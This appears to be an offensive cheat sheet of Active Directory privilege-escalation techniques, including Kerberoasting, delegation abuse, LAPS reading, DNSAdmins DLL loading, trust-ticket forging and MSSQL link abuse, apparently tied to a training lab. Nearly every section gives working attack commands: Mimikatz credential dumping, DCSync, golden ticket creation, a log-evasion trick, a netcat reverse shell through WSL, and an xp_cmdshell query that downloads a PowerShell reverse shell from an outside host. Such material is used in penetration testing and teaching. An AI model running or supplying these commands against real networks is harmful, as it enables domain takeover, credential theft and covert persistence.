Escalation

Kerberoasting 
Finding Service Accounts
PowerView
ADModule
1
Get-NetUser –SPN
Copied!
1
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} Properties ServicePrincipalName
Copied!
Request TGS
PowerShell Native
PowerView
1
Add-Type -AssemblyName System.IdentityModel 
2
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" 
Copied!
1
Request-SPNTicket 
Copied!
Exporting / Cracking
Rubeus / Hashcat
Mimikatz / TGSRepCrack
1
# Roast
2
Rubeus.exe kerberoast /simple /nowrap [/user:USER] [/domain:DOMAIN] [/dc:DC]
3
​
4
# Crack
5
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
Copied!
1
# Check they have been granted:
2
klist
3
​
4
# Export using Mimikatz
5
Invoke-Mimikatz -Command '"kerberos::list /export"' 
6
​
7
# Crack
8
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\240a10000-student.kirbi 
Copied!
AS-REP Roasting
Finding Accounts with Kerberos pre-auth disabled
Powerview_dev
ADModule
1
Get-DomainUser -PreauthNotRequired -Verbose
Copied!
1
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Copied!
Force Disable kerberos preauth
PowerView_dev
1
# Checking current groups ACL rights:
2
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
3
​
4
# Disabling kerberos pre-auth for a user:
5
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} –Verbose
Copied!
ASREPRoast
Rubeus
Invoke-ASREPRoast
1
# Get the hashes of all
2
Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH] 
3
​
4
# Crack with hashcat
5
hashcat asreproast.txt -m 18200 /usr/share/wordlists/rockyou.txt --force
Copied!
1
# Use ASREPRoast:
2
Get-ASREPHash -UserName VPN1user -Verbose
3
​
4
# Do all automatically:
5
Invoke-ASREPRoast -Verbose
6
​
7
# Crack using John
8
./john vpn1user.txt --wordlist=wordlist.txt
Copied!
SetSPN - Targeted Kerberoasting
Enumeration
PowerView_dev
ADModule
1
# Viewing our ACL permissions:
2
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
3
​
4
# Check if user has SPN:
5
Get-DomainUser -Identity supportuser | select serviceprincipalname
Copied!
1
# Check if user has SPN already:
2
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
Copied!
Setting SPN (must be unique for domain)
PowerView / SharpView
ADModule
1
Set-DomainObject -Identity USER -SET @{serviceprincipalname='ops/whatever1'}
2
​
3
## Clean up
4
Set-DomainObject -Identity USER -clear serviceprincipalname
Copied!
1
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
Copied!
Extraction and cracking same as kerberoasting. 
Unconstrained Delegation
Enumeration
PowerView
ADModule
1
Get-NetComputer -UnConstrained
Copied!
1
Get-ADComputer -Filter {TrustedForDelegation -eq $True} 
2
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Copied!
Compromise server then wait, or use printer bug with Rubeus Listening 
1
# Printer bug https://github.com/leechristensen/SpoolSample
2
​
3
# Listen with Rubeus
4
.\Rubeus.exe monitor /interval:5 
5
​
6
# Use printer bug
7
.\SpoolSample_v4.5_x64..exe TARGET CAPTURE
8
​
9
# Use ticket
10
Rubeus.exe ptt /ticket:<base64ticket>
Copied!
Export tickets and steal DA
Rubeus
MimiKatz
1
# Look at tickets on system (run as system to see all)
2
Rubeus.exe triage
3
​
4
# Get ticket
5
Rubeus.exe dump /luid:TICKETLUID /nowrap
6
​
7
# Use ticket
8
Rubeus.exe ptt [/ticket:BASE64TICKET] [/luid:LUID]
Copied!
1
# Export: 
2
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
3
​
4
# PTT:
5
Invoke-Mimikatz -Command '"kerberos::ptt C:\Documents\user1\[0;2ceb8b3]-2.kirbi"' 
Copied!
Constrained Delegation
Enumeration
PowerView_dev
ADModule
1
# Which User/Comp
2
Get-DomainUser –TrustedToAuth 
3
Get-DomainComputer –TrustedToAuth
4
​
5
# What can the found users/comps do
6
Get-DomainUser USER -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto
7
Get-DomainComputer COMP -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto
Copied!
1
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Copied!
Getting Ticket
Need NTLM hash or clear creds for the user with constrained delegation
Rubeus
Kekeo
1
===DCSYNC===
2
# On comp with contrained delegation rights for time\dcorp-dc. 
3
# hash is of the machine account
4
Rubeus.exe s4u /user:COMP$ /rc4:HASH /impersonateuser:Administrator /msdsspn:"time/DC.DOMAIN.LOCAL" /altservice:LDAP,cifs /ptt
5
​
6
#DCsync
7
dcsync DOMAIN DOMAIN\krbtgt
8
​
9
===FILESHARE===
10
# On user with constrained delegation rights for CIFS\COMP
11
# Hash is of the user with delegation rights
12
Rubeus.exe s4u /user:USER /rc4:HASH /impersonateuser:Administrator /msdsspn:"CIFS/COMP" /ptt
13
​
14
# Check Access
15
ls \\COMP\c$\
Copied!
1
===DCSYNC===
2
## Request TGT with Kekeo
3
tgt::ask /user:COMP$ /domain:DOMAIN /rc4:HASH
4
​
5
## Request TGS with Kekeo
6
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/DC.DOMAIN.local|ldap/DC.DOMAIN.local
7
​
8
## Extract Ticket
9
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'
10
​
11
## DCSync
12
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\krbtgt"'
13
 
14
===FILE SHARE===
15
## Request TGT with Kekeo
16
kekeo# tgt::ask /user:USER /domain:DOMAIN /rc4:HASH
17
​
18
## Next request TGS with kekeo (note cifs service id on end)
19
tgs::s4u /tgt:TGT_.kirbi /user:[email protected] /service:cifs/COMP-FQDN
20
 
21
## Inject ticket with mimikatz
22
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'
23
​
24
## Check it worked 
25
ls \\COMP-FQDN\c$
Copied!
Resource Based Constrained Delegation
Enumeration
1
# ACL can be found with BH or invoke-acl scanner / get-acl etc.
2
# Need to control a machine with SPN or ability to add a domain machine (normal user)
3
# Also need write permissoion on a computer object
Copied!
Adding New Computer Object
1
Import-Module .\Powermad.psd1
2
​
3
New-MachineAccount -Domain offensiveps.powershell.local -DomainController 192.168.2.1 -MachineAccount AttackCompObj -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose
Copied!
Set RBCD on target
1
# Import AD Module
2
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
3
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
4
​
5
# Set RBCD on Target
6
Set-ADComputer <targethostname> -PrincipalsAllowedToDelegateToAccount <AttackCompObj>$ -Verbose 
Copied!
Control Target
1
# Create hash of plaintext password if creating a new machine 
2
.\Rubeus.exe hash /password:<computerobjpassowrd>
3
​
4
# Request TGS 
5
.\Rubeus.exe s4u /user:AttackCompObj$ /rc4:HASH /msdsspn:http/<target> /impersonateuser:Administrator /ptt
6
​
7
# HTTP allows psremote
8
Enter-pssession -computername <target>  
Copied!
LAPS Abuse
Enumeration
LAPS Module
PowerView
1
# Easiest done with the LAPS powershell module
2
​
3
# Get OU with powerview
4
Get-NetOU
5
​
6
# Import module
7
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 
8
​
9
# Find the OUs that can read LAPS passwords
10
Find-AdmPwdExtendedRights -Identity <OU>
Copied!
1
# Basic but reliable
2
Get-NetOU -FullData
3
​
4
# Script to get in nice format (unreliable)
5
Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ } 
Copied!
Abuse
LAPS Module
PowerView
ADModule
1
# Once we have compromised a user that sits within an OU that can read LAPS
2
Get-AdmPwdPassword -ComputerName <targetmachine>
3
​
4
# After gaining password you can log in to machine as <targetmachine>\Administrator
5
​
6
# If we have SYSTEM on a LAPS machine, we can alter the password expiration time so we can persist longer on the machine.
7
​
8
# If we have DA we can modify ACLs of computer objects to provide attackers with permissions to read passwords in clear.
9
​
10
# Client component (C:\Program Files\LAPS\CSE\AdmPwd.dll) has no integrity check and can be replaced with malicious dll for attacks such as known password, long expiration time etc.
Copied!
1
# Once we have compromised user with privs:
2
Get-ADObject -SamAccountName <targetmachinegt; | select ExpandProperty ms-mcs-admpwd
Copied!
1
# Once we have compromised user with privs:
2
Get-ADComputer -Identity <targetmachine> -Properties msmcs-admpwd | select -ExpandProperty ms-mcs-admpwd 
Copied!
Just Enough Administration (JEA) Abuse
JEA allows non admin users to psremote using certain psremote configurations. These are restricted but can be in a configuration where you are running as an admin. This means if you break out of the confines of configuration then you are an admin of the box.
Enumeration
1
AD descriptions. So far havent seen any official way to scan for them.
2
​
3
# Role Capability file (Visible cmdlets etc)
4
New-PSRoleCapabilityFile -Path .\JEA.psrc
5
​
6
# Session configuration files (user mappings and role definitions)
7
New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -Path .\JEA.pssc
8
Register-PSSessionConfiguration -Path .\JEA.pssc -Name 'Persist' -Force 
9
​
10
# If you can find .pssc or .psrc files then they can help breakout. 
Copied!
Abuse
1
# Connect to JEA endpoint
2
Enter-PSSession -ComputerName <target> -ConfigurationName <config name>
3
​
4
# Enum commands available, look them up in docs to see what is possible
5
Get-Command 
6
​
7
# Some dangerous cmdlets
8
start-process 
9
add-computer
10
new-iissite
11
set-pssessionconfiguration (set-pssessionconfiguration -Name <profilename> -SecurityDescriptorSDDL <SDDL>)(https://gist.github.com/jborean93/6d9aaf868d1d40344188984ebb431b04)
Copied!
PowerShell Web Access (PSWA) Abuse
Enumeration
1
# PSWA can be used to get a powershell session on port 443. 
2
# Default path
3
https://hostname/pswa
4
​
5
# Requires admin creds, available cmdlets can be restricted
6
Get-Command 
Copied!
Abuse
1
# Depends on config, but look for sensitive commands and binaries.
2
Net.exe 
3
Reg.exe 
4
Invoke-Command 
5
Start-Process
6
​
7
# If a breakout is needed refer to JEA as well. 
Copied!
Configure for Persistance
1
# Install
2
Install-WindowsFeature -Name WindowsPowerShellWebAccess
3
​
4
# Configure
5
Install-PswaWebApplication -useTestCertificate 
6
​
7
# Configure Rules (Wildcard * can be used for all values allowing all users / cmds)
8
Add-PswaAuthorizationRule -UserName <domain\user> -ComputerName <computer_name> -ConfigurationName <session_configuration_name> 
Copied!
Windows Subsystem Linux (WSL) Abuse
Enumeration
1
# Find linux distro on windows host, should see binaries and filesystem
2
​
3
# Can access files like on linux /etc/shadow etc. 
4
​
5
# Worth looking for keytab files. These allow linux to talk kerberos and can be cracked. https://github.com/sosdave/KeyTabExtract
6
 python3 keytabextract.py /root/ADShare/wslhost.keytab
Copied!
Abuse
1
# Run windows binaries with bash
2
bash.exe -c cmd.exe 
3
​
4
# Run windows binaries with wsl
5
wsl.exe cmd.exe 
6
​
7
# These run with permissions of WSL process, as current windows user.
8
​
9
# Reverse Shell
10
wsl.exe mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.100.1 443 1>/tmp/backpipe
11
​
12
# Can be useful for stealth since its harder to detect malicious activity on WSL. ELF persistance would be very good.
Copied!
Windows Device Guard Bypass
Enumeration
1
# With device guard you will be in a shell with no language mode and app whitelisting.
2
​
3
# List policies
4
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Copied!
Bypass
1
# Known also as CLM bypasses, there are several online.
2
# Typically windows signed binaries allowed, worth trying:
3
Procdump.exe 
4
Psexec.exe
5
Reg.exe
6
​
7
# CLM Bypasses:
8
​
Copied!
DNSAdmins
Enumeration
PowerView
ADModule
1
Get-NetGroupMember -GroupName "DNSAdmins"
Copied!
1
Get-ADGroupMember -Identity DNSAdmins
Copied!
Abuse 
1
Compromise DNSAdmin user is necessary to perform abuse
2
​
3
# Configure DLL using dnscmd.exe:
4
dnscmd DC /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll 
5
​
6
# Configure DLL using DNSServer module:
7
$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc Verbose -All 
8
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll" 
9
Set-DnsServerSetting -InputObject $dnsettings -ComputerName DC -Verbose
10
​
11
# Restart DNS Service
12
sc \\DC stop dns 
13
sc \\DC start dns 
14
​
15
# By default, the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log
Copied!
Microsoft Exchange Abuse
Enumeration
1
# Exchange groups have high permissions. 
2
Look for groups such as:
3
Organization Management (Full control over exchange windows permissions group)
4
Exchange Windows Permissions (WriteDACL on domain object pre server 2019)
5
Exchange Trusted SubSystem (can modify DACL of DNSAdmins and others, local admin to exchange servers)
Copied!
Abuse
1
# Own user in groups above or own exchange server
2
# PTH as user or exchange server
3
​
4
# Import ADModule and RACE
5
Import-Module .\ADModulemaster\Microsoft.ActiveDirectory.Management.dll
6
Import-Module .\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 
7
. .\RACE.ps1 
8
​
9
# Give user access to DC
10
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -Server techcorp.local -Verbose
11
​
12
# Give DCSync 
13
Set-ADACL -SamAccountName DOMAIN\USER DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose 
14
​
15
# (As DA)Giving user WriteDACL over windows exhchange group for persistance
16
Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -SAMAccountName DOMAIN\USER -Verbose 
17
​
18
# (As user now added) Use that priv to modify acl of windows permissions and give write member 
19
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -GUIDRight WriteMember -Server techcorp.local -Verbose
Copied!
Cross-Domain Trust Tickets
Get Trust Key
1
# Mimikatz trust
2
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName DC 
3
​
4
# Mimikatz dcsync
5
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\TARGETDOMAINquot;'
Copied!
Forging Inter-Realm TGT
1
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3250652063-538504511 /sids:S-15-21-280534878-14999702234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.LOCAL /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' 
Copied!
Command
Function
Kerberos::golden
Mimikatz Module
/domain:DOMAIN.LOCAL
FQDN of the current domain
/sid:S-1-5-21-166606631-311152063-538504511
SID of the current domain
/sids:S-1-5-21-282224878-1496977734-700767426-519
SID of the enterprise admins group of the parent domain 
/rc4:HASH
RC4 of the trust key
/user:Administrator
User to impersonate
/service:krbtgt
Target service in the parent domain
/target:TARGETDOMAIN.LOCAL
FQDN of the parent domain
/ticket:C:\AD\Tools\kekeo\trust_tkt.kirbi
Path where ticket is to be saved
Get TGS for Service in target domain (CIFS below, but could be LDAP, HOST and HTTP) using trust ticket
1
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/DC.DOMAIN 
Copied!
Use TGS to access service in target (may need to use twice)
1
# Convert and use TGS
2
.\kirbikator.exe lsa .\CIFS.DC.DOMAIN.kirbi
3
​
4
# Access
5
ls \\DC.DOMAIN\c$ 
Copied!
Cross-Domain using krbtgt Hash
Create Ticket Abusing SID History
1
# Get krbtgt
2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
3
​
4
# Create token
5
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:HASH /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Copied!
In the above command, the mimkatz option "/sids" is forcefully setting the SID History for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group.
Use Ticket
1
# PTT
2
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' 
3
​
4
# Access
5
ls \\DC.DOMAIN.local\c$
6
​
7
gwmi -class win32_operatingsystem -ComputerName dc.DOMAIN.local
Copied!
Avoiding suspicious logs
1
Invoke-Mimikatz -Command '"kerberos::golden /user:dc$ /domain:DOMAIN.local /sid:S-1-5-211874506631-3219952063-538504511 /groups:516 /sids:S-1-521-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:HASH /ptt"'
2
​
3
# S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers 
4
# S-1-5-9 – Enterprise Domain Controllers
5
​
6
# Looks like DCs talking between each other and still grants us a ticket for the enterprise DCs.
Copied!
Cross-Forest Trust Tickets
Get Trust Key
1
# Mimikatz trust
2
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
3
​
4
# Mimikatz dump
5
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Copied!
Creating inter-forest TGT
1
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
Copied!
Using inter-forest ticket to request TGS
1
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/TARGET-dc.DOMAIN.local 
Copied!
Use TGS
1
# Use TGS to access service
2
.\kirbikator.exe lsa .\CIFS.TARGET-dc.DOMAIN.local.kirbi
3
​
4
# Found file share:
5
Invoke-ShareFinder -Domain DOMAIN.local
6
​
7
# Check Access
8
ls \\TARGET-dc.DOMAIN.local\SharedwithDCorp\
Copied!
MSSQL Trust Abuse
PowerUpSQL: https://github.com/NetSPI/PowerUpSQL​
Finding MSSQL Instances
1
# Discovery (SPN Scanning): 
2
Get-SQLInstanceDomain
3
​
4
# Check Accessibility: 
5
Get-SQLConnectionTestThreaded
6
​
7
# Use together:
8
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 
9
​
10
# Gather Information: 
11
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Copied!
Enumerating Database Links
PowerUpSQL
Manual SQL
1
# Look for links to remote servers
2
Get-SQLServerLink -Instance instance-mssql -Verbose
3
​
4
# Enumerating nested database links 
5
Get-SQLServerLinkCrawl -Instance instance-mssql -Verbose
Copied!
1
# look for links to remote servers
2
select * from openquery("INSTANCE",'select * from master..sysservers')
3
​
4
# Enumerating nested database links 
5
select * from openquery("INSTANCE",'select * from openquery("dcorpmgmt",''select * from master..sysservers'')')
Copied!
Enabling xp_cmdshell if rpcout is enabled (disabled by default)
1
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "INSTANCE"
Copied!
Executing Commands
PowerUpSQL
Manual SQL
1
# Executes command over link
2
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "exec master..xp_cmdshell 'whoami'"
3
​
4
# shell
5
Get-SQLServerLinkCrawl -Instance INSTANCE -Query "powershell.exe iex (iwr http://192.168.50.51/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.50.51 -Port 443"
Copied!
1
# Executes command over nested links
2
select * from openquery("dcorp-sql1",'select * from openquery("dcorpmgmt",''select * from openquery("eu-sql",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')')
Copied!
PAM Trust
PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. Temporary Group Membership also introduced so perms only given for set time.
Enumeration
1
# Import ADModule
2
​
3
# Detect if current forest is PAM trust
4
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
5
​
6
# Enumerate Shadow Principals
7
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
8
​
9
# Enumerate if current forest is managed by a bastion forest
10
Get-ADTrust -Filter {(ForestTransitive -eq $True)} 
11
# Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External = PAM
Copied!
Abuse
1
# Find users with shadow principals and names of shadow principal objects
2
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
3
​
4
# Add a compromised user to the group 
5
Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=gcbsec,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=gcbsec,DC=local"}
6
​
7
# Once compromised you can manage forests with EA permissions.
Copied!